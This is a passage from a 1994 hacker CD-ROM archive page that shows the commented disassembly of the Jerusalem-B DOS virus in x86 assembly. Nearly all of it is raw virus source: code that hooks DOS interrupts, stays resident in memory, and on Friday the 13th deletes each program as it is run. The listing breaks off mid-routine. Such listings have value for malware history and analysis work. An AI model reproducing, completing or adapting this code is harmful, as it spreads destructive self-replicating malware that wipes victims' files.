home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
JE.ASM
< prev
next >
Wrap
Assembly Source File
|
1994-07-17
|
17KB
|
723 lines
PAGE 59,132
;*****************************************************************************
; Jerusalem Virus - Strain B
;
; Disassembled and commented by:
;
; - Captain Morgan -
;*****************************************************************************
.286c
data_1e equ 2Ch
data_2e equ 43h
data_3e equ 45h
data_4e equ 47h
data_5e equ 49h
data_6e equ 51h
data_7e equ 53h
data_8e equ 57h
data_9e equ 5Dh
data_10e equ 5Fh
data_11e equ 61h
data_12e equ 63h
data_13e equ 65h
data_14e equ 78h
data_15e equ 7Ah
data_16e equ 7Ch
data_17e equ 7Eh
data_18e equ 0Ah
data_19e equ 0Ch
data_20e equ 0Eh
data_21e equ 0Fh
data_22e equ 11h
data_23e equ 13h
data_24e equ 15h
data_25e equ 17h
data_26e equ 19h
data_27e equ 1Bh
data_28e equ 1Dh
data_29e equ 1Fh
data_30e equ 29h
data_31e equ 2Bh
data_32e equ 2Dh
data_33e equ 2Fh
data_34e equ 31h
data_35e equ 33h
data_36e equ 4Eh
data_37e equ 70h
data_38e equ 72h
data_39e equ 74h
data_40e equ 76h
data_41e equ 7Ah
data_42e equ 80h
data_43e equ 82h
data_44e equ 8Fh
seg_a segment
assume cs:seg_a, ds:seg_a
org 100h
je proc far
start:
jmp loc_2 ; (0195)
db 73h, 55h, 4Dh, 73h, 44h, 6Fh
db 73h, 0, 1, 0EBh, 21h, 0
db 0, 0, 0ABh, 0Bh, 2Ch, 2
db 70h, 0, 92h, 0Eh, 29h, 1Ah
db 0EBh, 4, 59h, 6Fh, 0A8h
db 7Bh
db 13 dup (0)
db 0E8h, 6, 0D7h, 62h, 21h, 80h
db 0, 0, 0, 80h, 0, 62h
db 21h, 5Ch, 0, 62h, 21h, 6Ch
db 0, 62h, 21h, 10h, 7, 60h
db 5Bh, 0C5h, 0, 60h, 5Bh, 0
db 0F0h, 6, 0, 4Dh, 5Ah, 30h
db 0, 53h, 0, 1Fh, 0, 20h
db 0, 0, 0, 0FFh, 0FFh, 0B2h
db 9, 10h, 7, 84h, 19h, 0C5h
db 0, 0B2h, 9, 20h, 0, 0
db 0, 2Eh, 0Dh, 0Ah, 0, 0
db 5, 0, 20h, 0, 26h, 12h
db 46h, 0A3h, 0, 2, 10h, 0
db 20h, 9Dh, 0, 0, 7Bh, 3Dh
db 2Eh, 9Bh
db 'COMMAND.COM'
db 1, 0, 0, 0, 0, 0
loc_2:
cld ; Clear direction
mov ah,0E0h
int 21h ; DOS Services ah=function E0h
cmp ah,0E0h
jae loc_3 ; Jump if above or =
cmp ah,3
jb loc_3 ; Jump if below
mov ah,0DDh
mov di,100h
mov si,710h
add si,di
mov cx,cs:[di+11h]
nop ;*Fixup for MASM (M)
int 21h ; DOS Services ah=function DDh
loc_3:
mov ax,cs
add ax,10h
mov ss,ax
mov sp,700h
loc_4:
push ax
mov ax,0C5h
push ax
retf ; Return far
db 0FCh, 6, 2Eh, 8Ch, 6, 31h
db 0, 2Eh, 8Ch, 6, 39h, 0
db 2Eh, 8Ch, 6, 3Dh, 0, 2Eh
db 8Ch, 6, 41h, 0, 8Ch, 0C0h
db 5, 10h, 0, 2Eh, 1, 6
db 49h, 0, 2Eh, 1, 6, 45h
db 0, 0B4h, 0E0h, 0CDh, 21h, 80h
db 0FCh, 0E0h, 73h, 13h, 80h, 0FCh
db 3, 7, 2Eh, 8Eh, 16h, 45h
db 0, 2Eh, 8Bh, 26h, 43h, 0
db 2Eh, 0FFh, 2Eh, 47h, 0, 33h
db 0C0h, 8Eh, 0C0h, 26h, 0A1h, 0FCh
db 3, 2Eh, 0A3h, 4Bh, 0, 26h
db 0A0h, 0FEh, 3, 2Eh, 0A2h, 4Dh
db 0
db 26h
je endp
;██████████████████████████████████████████████████████████████████████████
;
; External Entry Point
;
;██████████████████████████████████████████████████████████████████████████
int_24h_entry proc far
mov word ptr ds:[3FCh],0A5F3h
mov byte ptr es:data_47,0CBh
pop ax
add ax,10h
mov es,ax
push cs
pop ds
mov cx,710h
shr cx,1 ; Shift w/zeros fill
xor si,si ; Zero register
mov di,si
push es
mov ax,142h
push ax
;* jmp far ptr loc_1 ;*(0000:03FC)
db 0EAh, 0FCh, 3, 0, 0
db 8Ch, 0C8h, 8Eh, 0D0h, 0BCh, 0
db 7, 33h, 0C0h, 8Eh, 0D8h, 2Eh
db 0A1h, 4Bh, 0, 0A3h, 0FCh, 3
db 2Eh, 0A0h, 4Dh, 0, 0A2h, 0FEh
db 3
int_24h_entry endp
;██████████████████████████████████████████████████████████████████████████
;
; External Entry Point
;
;██████████████████████████████████████████████████████████████████████████
int_21h_entry proc far
mov bx,sp
mov cl,4
shr bx,cl ; Shift w/zeros fill
add bx,10h
mov cs:data_35e,bx
mov ah,4Ah ; 'J'
mov es,cs:data_34e
int 21h ; DOS Services ah=function 4Ah
; change mem allocation, bx=siz
mov ax,3521h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov cs:data_25e,bx
mov cs:data_26e,es
push cs
pop ds
mov dx,25Bh
mov ax,2521h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov es,ds:data_34e
mov es,es:data_1e
xor di,di ; Zero register
mov cx,7FFFh
xor al,al ; Zero register
locloop_5:
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
cmp es:[di],al
loopnz locloop_5 ; Loop if zf=0, cx>0
mov dx,di
add dx,3
mov ax,4B00h
push es
pop ds
push cs
pop es
mov bx,35h
push ds
push es
push ax
push bx
push cx
push dx
mov ah,2Ah ; '*'
int 21h ; DOS Services ah=function 2Ah
; get date, cx=year, dx=mon/day
mov byte ptr cs:data_20e,0
cmp cx,7C3h
je loc_7 ; Jump if equal
cmp al,5 ; Check to see if it's Friday
jne loc_6 ; Jump if not equal
cmp dl,0Dh ; Check to see if it's the 13th
jne loc_6 ; Jump if not equal
inc byte ptr cs:data_20e
jmp short loc_7 ; (02F7)
db 90h
loc_6:
mov ax,3508h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov cs:data_23e,bx
mov cs:data_24e,es
push cs
pop ds
mov word ptr ds:data_29e,7E90h
mov ax,2508h
mov dx,21Eh
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
loc_7:
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
pushf ; Push flags
call dword ptr cs:data_25e
push ds
pop es
mov ah,49h ; 'I'
int 21h ; DOS Services ah=function 49h
; release memory block, es=seg
mov ah,4Dh ; 'M'
int 21h ; DOS Services ah=function 4Dh
; get return code info in ax
mov ah,31h ; '1'
mov dx,600h
mov cl,4
shr dx,cl ; Shift w/zeros fill
add dx,10h
int 21h ; DOS Services ah=function 31h
; terminate & stay resident
db 32h, 0C0h, 0CFh, 2Eh, 83h, 3Eh
db 1Fh, 0, 2, 75h, 17h, 50h
db 53h, 51h, 52h, 55h, 0B8h, 2
db 6, 0B7h, 87h, 0B9h, 5, 5
db 0BAh, 10h, 10h, 0CDh, 10h, 5Dh
db 5Ah, 59h, 5Bh, 58h, 2Eh, 0FFh
db 0Eh, 1Fh, 0, 75h, 12h, 2Eh
db 0C7h, 6, 1Fh, 0, 1, 0
db 50h, 51h, 56h, 0B9h, 1, 40h
db 0F3h, 0ACh
db 5Eh, 59h, 58h
loc_8:
jmp dword ptr cs:data_23e
db 9Ch, 80h, 0FCh, 0E0h, 75h, 5
db 0B8h, 0, 3, 9Dh, 0CFh, 80h
db 0FCh, 0DDh, 74h, 13h, 80h, 0FCh
db 0DEh, 74h, 28h, 3Dh, 0, 4Bh
db 75h, 3, 0E9h, 0B4h, 0
loc_9:
popf ; Pop flags
jmp dword ptr cs:data_25e
loc_10:
pop ax
pop ax
mov ax,100h
mov cs:data_18e,ax
pop ax
mov cs:data_19e,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
popf ; Pop flags
mov ax,cs:data_21e
jmp dword ptr cs:data_18e
loc_11:
add sp,6
popf ; Pop flags
mov ax,cs
mov ss,ax
mov sp,710h
push es
push es
xor di,di ; Zero register
push cs
pop es
mov cx,10h
mov si,bx
mov di,21h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ax,ds
mov es,ax
mul word ptr cs:data_41e ; ax = data * ax
add ax,cs:data_31e
adc dx,0
div word ptr cs:data_41e ; ax,dxrem=dx:ax/data
mov ds,ax
mov si,dx
mov di,dx
mov bp,es
mov bx,cs:data_33e
or bx,bx ; Zero ?
jz loc_13 ; Jump if zero
loc_12:
mov cx,8000h
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
add ax,1000h
add bp,1000h
mov ds,ax
mov es,bp
dec bx
jnz loc_12 ; Jump if not zero
loc_13:
mov cx,cs:data_32e
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop ax
push ax
add ax,10h
add cs:data_30e,ax
data_47 db 2Eh
db 1, 6, 25h, 0, 2Eh, 0A1h
db 21h, 0, 1Fh, 7, 2Eh, 8Eh
db 16h, 29h, 0, 2Eh, 8Bh, 26h
db 27h, 0, 2Eh, 0FFh, 2Eh, 23h
db 0
loc_14:
xor cx,cx ; Zero register
mov ax,4301h
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ah,41h ; 'A'
int 21h ; DOS Services ah=function 41h
; delete file, name @ ds:dx
mov ax,4B00h
popf ; Pop flags
jmp dword ptr cs:data_25e
loc_15:
cmp byte ptr cs:data_20e,1
je loc_14 ; Jump if equal
